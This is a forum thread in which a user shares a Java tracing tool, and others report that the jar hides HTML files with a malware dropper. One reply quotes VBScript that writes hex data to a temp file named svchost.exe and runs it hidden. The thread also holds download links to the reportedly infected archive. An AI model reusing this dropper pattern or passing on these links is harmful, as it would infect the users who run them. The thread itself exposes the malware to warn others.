![]() |
#1
|
|||
|
|||
Tracer v2
Tracer v2
Java tracer, this time as a standalone jar, Just select a Jar and an output text file, click Trace, and wheel that's it! classes which start with "java." can't be logged! Download link: http://www18.zippyshare.com/v/qhcVnrK0/file.html Last edited by CodeCracker; 01-17-2018 at 05:03. |
The Following 2 Users Say Thank You to CodeCracker For This Useful Post: | ||
niculaita (01-09-2018), wilson bibe (01-10-2018) |
#2
|
|||
|
|||
This file contains a VIRUS !!!
No, it's no false positive. There are at least seven HTML files "package.html" inside which contain JavaScript to drop a file called "svchost.exe" |
#3
|
|||
|
|||
Yep actually looks pretty dodgy, seems to try and use vbscript to drop svchost.exe
--<SCRIPT Language=VBScript><!-- DropFileName = "svchost.exe" WriteData = ...... Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 </SCRIPT> Haven't actually checked out the file that is to be dropped yet. |
#4
|
|||
|
|||
I could read same report at another forum and CodeCracker replied saying that is a false positive. But... i still have my doubts
![]() |
#5
|
|||
|
|||
False positive due to some htmls present under jar archive.
If you already runed the jar file don't be alarmed since the html are not executed, and not even used. Htmls removed, check: http://www18.zippyshare.com/v/qhcVnrK0/file.html |
#6
|
|||
|
|||
so who and why the hell added malware html into your archives?
|
#7
|
|||
|
|||
Please, read the definition before stating something obviously wrong:
Quote:
Or would you call the ebolavirus "false positive" just because it's contained inside a glass phial? |
The Following User Says Thank You to Kerlingen For This Useful Post: | ||
Mkz (08-03-2018) |
#8
|
|||
|
|||
@CodeCracker can this be used for a jar file that is launched with an EXE file?
|
#9
|
|||
|
|||
It can trace only jars
Quote:
You could try JavaClassManager https://forum.exetools.com/showthread.php?t=18592 to try to save loaded classes. JavaClassManager can launch both jar and exe extensions, it is just a matter of intercepting class loading and editing classes to do what you want. |
The Following User Says Thank You to CodeCracker For This Useful Post: | ||
niculaita (07-17-2018) |
#10
|
|||
|
|||
Thanks for the guidance bro. i will try your recommendation
![]() peace |
![]() |
Thread Tools | |
Display Modes | |
|
|